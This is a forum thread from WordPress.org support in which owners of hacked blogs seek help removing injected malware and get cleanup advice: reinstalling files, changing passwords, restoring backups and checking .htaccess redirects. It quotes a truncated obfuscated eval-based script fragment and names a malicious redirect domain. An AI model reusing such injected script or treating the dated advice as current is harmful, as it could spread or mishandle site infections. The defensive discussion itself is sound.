WordPress.org

Ready to get started?Download WordPress

Forums

My blog is hacked and with malware! (23 posts)

  1. sinankurt
    Member
    Posted 2 years ago #

    Hello,

    i am from germany so sorry for my bad english.

    I actually saw on Google Chrome that my WordPress Blog (www.quartel.de) includes malware. I did everything to remove that malwares, but i actually dont know how.

    I donwloaded my whole WordPress-Content with Filezilla, but i dont know how and where to search for the viruses. Google says that it should like this:

    <script>var s=new String();try{document.getElementById('t3v2562v3r3').innerHTML}catch(q){r=1;c=String;}if(r&&document.createTextNode)o=2;e=window.eval;m=Array(4.5*o,18/o,52.5*o,204/o,16*o,

    How can i find this malwares?

  2. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    Don't try to search, replace all the wp files including plugins and theme files with a fresh copy, also change your wp password and also change it if used anywhere else (this is often how they get your wp password as it's the same as your hacked commercial account using the same email address and password...you should take this time to update to the latest versions each plugin/theme and wp..if your database was compromised (the offending code may be in a table in the database), change the password (and make sure you update wp-config). If you cannot login to wordpress as admin, rename the index.php file to index.html and try then...a new index.php filed is created...this index.php file is in the root of your theme. The likely location for the offending code is in the wp_options table...manually editing the database is not for a novice. Good luck!

  3. sinankurt
    Member
    Posted 2 years ago #

    Thanks for the fast answer.

    I can normally log-in to my Blog as admin and use it, too. But i dont know what you mena with replace? I mean then are all my things in the past deleted, not? That would be really bad.

  4. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    I mean to use your ftp client to manually replace all wp files.

    WP settings are kept in the database, if your db is not what was hacked, you will be OK. You may lose any customizations done directly to wp files, like custom css, etc...these can be simply re-edited using the files you downloaded as a ref...if you made the changes, you should know what they are.

  5. rballin
    Member
    Posted 2 years ago #

    My site got hacked as well. Should I uninstall WP and then re-install it?

  6. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    Yes, that's to make sure no files are infected with bad code. Please note to make sure to keep a copy of everything including a full backup of your database. Some say you can leave the wp-contents folder as is, but I am not convinced this folder cannot contain a hacked file as it is just as vulnerable as any one folder in wp to be hacked. I would do this manually via ftp as the admin scripts could be corrupt. And change those passwords you use.

  7. rballin
    Member
    Posted 2 years ago #

    I have a small issue...my hard drive crashed a few months ago and i didn't save the theme I downloaded and apid for...is there any way I can save that before i delete everything?

  8. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    You can connect to your site with FTP and download the theme files - actually to properly back it up your should do this often, then back that up!

  9. sinankurt
    Member
    Posted 2 years ago #

    Yes, I downloaded all files from my blog for now. But what to do in the next step? Please help me, I don't want that my blog gets blacklisted.

  10. rballin
    Member
    Posted 2 years ago #

    Ok so I deleted all the WP files then I uploaded a backup that I did this afternoon and my site looks as bare as the day I started it...what am I doing wrong??

  11. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    Before proceeding with a manual install/updates, it is important to review and understand all the related topics here:

    http://codex.wordpress.org/Installing_WordPress#Detailed_Instructions

    First you need to take inventory, then download what you need. Review the link above and make sure you fully understand it, then:

    Write down a list of the installed plugins and the theme. Each as they appear in the appropriate wp admin panel section will have links to the author and WordPress page for them. After confirming compatibility with the current WordPress version, Download the latest version, saving each to a common location. Once you have gathered the files you need, they need to be extracted. Once extracted, each will have a default folder name such as mythemev1.x, it is the whole folder inside that you need.

    Download WP 3.2.1 (make sure your host supports this version, it requires certain version of supporting programs/modules etc, like php. Extract files.

    The file sample-wp-config.php needs to be renamed to just wp-config and it needs to have the same data as your current wp-config.php (you can just copy the wp-config.php file but make sure it's correct and does not have errant code). This step is very important to do right.

    Verify that your .htaccess file or web.config file (IIS7) is correct.

    Create a new folder called BlogNewFiles (or whatever). Move the wp files to that folder. Navigate to the wp-contents folder, then plugins and then theme folders and put the plugins and theme folders you extracted into them accordingly.

    Log back into site as admin and deactivate your theme and all plugins. This is very important to have the next steps work right.

    Next,open Notepad (ascii text editor - NOT Word of other rich text editor) and past this in and save the file as ".maintenance" (dot first, no extension, or quotes):

    <?php $upgrading = time(); ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
    <title>Maintenance</title>
    <style type="text/css">
    .style1 {
    	font-size: x-large;
    }
    .style2 {
    	font-size: large;
    }
    </style>
    </head>
    <body style="background-color: #008080">
    <h1>Briefly unavailable for scheduled maintenance. Check back soon.</h1>
    <h2>This site is currently in Maintenance Mode. What, you say? Occasionally,
    Wordpress needs to have core files updated, plug-ins updated, and then a short period
    for testing is required. Look back soon.</h2>
    <h2>Thanks!</h2>
    </body>
    </html>
    <?php die(); ?>

    (Above is an example and can be styled as you choose)

    Using cPanel or phpmyadmin (see your web host documentation on this), and make sure you are quite clear on the instructions to backup your database, then do so.

    Back to FTP now, (make really sure you have ALL your files downloaded, both old and new), then rename the folders:

    wp-admin
    wp-contents and
    wp-includes

    to

    xxx-wp-admin
    xxx-wp-contents and
    xxx-wp-includes

    (this saves the files on the servers...if your upgrade fails, remove the new files and rename those back)

    Then upload your new files and after remove the .maintenance file(or rename).

    Log into site, activate your theme, activate your plugins, and review the site for style and functionality.

    If it it was files that were hacked, this will fix it, if not then work needs to be done on the database (which may again in turn corrupt your files, so this part may have to be redone too).

    Please reply with any questions and especially if this helped.

  12. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    @rballin, did you upload the files in the root also, following the instructions above?

  13. rballin
    Member
    Posted 2 years ago #

    I honestly don't understand any of this and I feel so screwed because I am now worse off than I was before.

  14. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    @rballin,

    Contact your webhost and see if they have any 'snapshots' of your files and database that precludes the problem. If not, you may need to hire someone.

  15. sinankurt
    Member
    Posted 2 years ago #

    I don't understand, too. I want to hire someone from sucuri, but I don't have a credit card. I am so demoralized, I don't know what do now. I think my blog gets blacklistted, and do one....

    I would give somebody from here my wp password and my FTP password if he/she could fix that problem. Please, I am in a so big problem :(

  16. rballin
    Member
    Posted 2 years ago #

    @sinankurt I ended up calling my web host and had them reinstall my site from a few days before I got hacked. They were able to locate the malware for me and deleted everything. I had Google re-index it and everything is fine now. I would suggest doing that if you can't afford to pay someone to help you.

  17. sinankurt
    Member
    Posted 2 years ago #

    @rballin Ok, what should I ask my Hoster to do know?

  18. rballin
    Member
    Posted 2 years ago #

    I explained that I was hacked. I told him that I tried to delete all the wordpress files, but wasn't sure how to reinstall them. Ask if they have a back up from a few days before you were hacked that they can install for you. Ask if they can take a look and see if there is anything there. My malware was in the Frontpage Extension, so have them check there as well as the code for the different pages. They should be able to delete it and put everything back to normal.

  19. ericgriffin
    Member
    Posted 2 years ago #

    Here is a simple step by step that I ran across that may help.

    http://actonweb.us/2011/01/how-to-clean-a-hacked-wordpress-site/

  20. Daniel Cid
    Member
    Posted 2 years ago #

    Also, note that this type of malware is related to stolen FTP passwords. We are seeing it on many sites and it comes through desktop viruses that steal passwords...

    We did a blog post explaining about it a while ago:
    http://blog.sucuri.net/2010/06/web-site-security-it-starts-with-your-desktop.html

    *The malware infection is different, but the method is the same.

    thanks,

  21. cmcenearney
    Member
    Posted 2 years ago #

    My site was recently hacked with users being redirected to

    http://sweepstakesandcontestsinfo.com/nl.php?nnn=555

    The hackers injected all kinds of crap into my site - adding scripts to .html files and .php files and creating new .php files. MOST IMPORTANTLY: they added redirect to the .htaccess files as described here:

    http://blog.sucuri.net/2011/11/htaccess-redirection-to-sweepstakesandcontestsinfo-dot-com.html

    I deleted them and everything is ok again, for now. I still have to figure out how it happened. NOTE: .htaccess is normally "invisible", so if you're not accessing from the command line you might need to adjust settings in your ftp client. Useful info here (even if not hosted by dreamhost):
    http://wiki.dreamhost.com/Htaccess#Finding_.htaccess_Files

  22. Pioneer Valley Web Design
    Member
    Posted 2 years ago #

    cmcenearney,

    You will get more attention to your issue if you create a new post.

  23. mombley
    Member
    Posted 2 years ago #

    Hi!

    I see this is an old issue, but I have a question - if my db (of wp site) was hacked, can I do anything at all? This is just "in case" question, because as I see it, I can't - all of my rihts were shut down, so I can't even create a new db, even more, I can't login to phpMyAdmin ...

    Thanks!

Topic Closed

This topic has been closed to new replies.

About this Topic